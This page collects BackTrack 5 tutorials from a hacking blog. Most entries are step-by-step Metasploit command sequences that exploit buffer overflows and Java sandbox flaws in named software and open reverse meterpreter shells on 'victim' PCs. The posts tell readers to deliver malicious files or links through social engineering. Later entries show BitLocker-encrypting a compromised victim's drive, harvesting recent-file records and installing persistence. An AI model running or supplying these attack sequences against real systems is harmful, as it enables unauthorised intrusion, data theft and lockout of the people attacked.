Hacking Articles » BackTrack 5 Tutorials

Exploit Remote Windows PC using ERS Viewer 2011 ERS File Handling Buffer Overflow

Raj Chandel — Fri, 10 May 2013 08:21:42 +0000

This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the functionERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.

Exploit Targets

ERS Viewer 2011 (v11.04)

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/erdas_er_viewer_bof

msf exploit (erdas_er_viewer_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (erdas_er_viewer_bof)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (erdas_er_viewer_bof)>exploit

After we successfully generate the malicious ers File, it will stored on your local computer

/root/.msf4/local/msf.ers

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

exploit

Now send your msf.ers files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Windows PC using AudioCoder .M3U Buffer Overflow

Raj Chandel — Tue, 07 May 2013 12:11:47 +0000

This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

Exploit Targets

Audio Code 0.8.18

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/audio_coder_m3u

msf exploit (audio_coder_m3u)>set payload windows/meterpreter/reverse_tcp

msf exploit (audio_coder_m3u)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (audio_coder_m3u)>exploit

After we successfully generate the malicious m3u File, it will stored on your local computer

/root/.msf4/local/msf.m3u

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your msf.m3u files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Remote Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution

Raj Chandel — Sun, 28 Apr 2013 08:01:12 +0000

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

Java 7 Update 17

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_jre17_reflection_types

msf exploit (java_jre17_reflection_types)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (java_jre17_reflection_types)>set target 1

msf exploit (java_jre17_reflection_types)>set srvhost 192.168.0.106 (This must be an address on the local

msf exploit (java_jre17_reflection_types)>set payload windows/meterpreter/reverse_tcp

machine)

msf exploit (java_jre17_reflection_types)>exploit

Now an URL you should give to your victim http://192.168.1.0.106:8080/Mt7fUKs955I

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

Raj Chandel — Sat, 27 Apr 2013 10:52:27 +0000

Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted ‘USER’ command, a remote attacker can potentially have an unspecified impact.

Exploit Targets

FreeFloat FTP Server

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/ftp/freefloatftp_user

msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp

msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)

msf exploit (freefloatftp_user)>exploit

Best of Social Engineering Toolkit Attack

Raj Chandel — Mon, 22 Apr 2013 17:12:28 +0000

Bypassing Antivirus using Multi Pyinjector Shell Code Injection

Browser Autopwn Attack

Web Jacking Method

Create a Payload and Listener Attack

Infectious Media Generator Attack

Tab Napping Attack Method

Powershell Attack Vector Method

RATTE (Remote Administration Tool) Attack Method

PyInjector Shellcode Injection Attack

How to Encrypt Drive of Remote Victim PC

Raj Chandel — Sat, 20 Apr 2013 11:17:29 +0000

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell‘command to get command prompt of the target.

Type manage-bde -status and press Enter.

Run the following command to enable BitLocker on your desired PC drive (in my case g drive), store the recovery key on the c:/windows/system drive, and generate a random recovery password

manage-bde -on g: -RecoveryKey c:/windows/system -RecoveryPassword

Hack Windows PC using Firebird Relational Database CNCT Group Number Buffer Overflow

Raj Chandel — Tue, 12 Mar 2013 05:47:32 +0000

This module exploits vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot allows executing the ROP chain which ultimately is used to execute Virtual Alloc and bypass DE

Exploit Targets

Windows FB 2.5.2.26539 (default)

Windows FB 2.5.1.26351

Windows FB 2.1.5.18496

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/misc/fb_cnct_group

msf exploit (fb_cnct_group)>set payload windows/meterpreter/reverse_tcp

msf exploit (fb_cnct_group)>set lhost 192.168.0.102 (IP of Local Host)

msf exploit (fb_cnct_group)>set rhost 192.168.0.111 (This must be an address on the Remote machine)

msf exploit (fb_cnct_group)>exploit

Exploit Windows, Linux or MAC PC using Java Applet JMX Remote Code Execution

Raj Chandel — Tue, 26 Feb 2013 17:37:11 +0000

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Exploit Targets

Java 7 Update 10

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_jre17_jmxbean_2

msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)

msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_jmxbean_2)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

How to Gather Recent Files Dump of Remote PC

Raj Chandel — Fri, 22 Feb 2013 03:19:50 +0000

The dumplinks module is a modified port of Harlan Carvey’s lslnk.pl Perl script. This module will parse .lnk files from a user’s Recent Documents folder and Microsoft Office’s Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.

Exploit Targets

Windows PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open backtrack terminal type msfconsole

Now type use post/windows/gather/dumplinks

msf exploit (dumplinks)>set session 1

msf exploit (dumplinks)>exploit

Windows Manage User Level Persistent Payload Installer

Raj Chandel — Wed, 20 Feb 2013 05:42:44 +0000

Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires ‘Logon as a batch job’ permissions (SeBatchLogonRight)

Exploit Targets

Windows PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/local/s4u_persistence

msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp

msf exploit (s4u_persistence)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (s4u_persistence)>set session 1

msf exploit (s4u_persistence)>exploit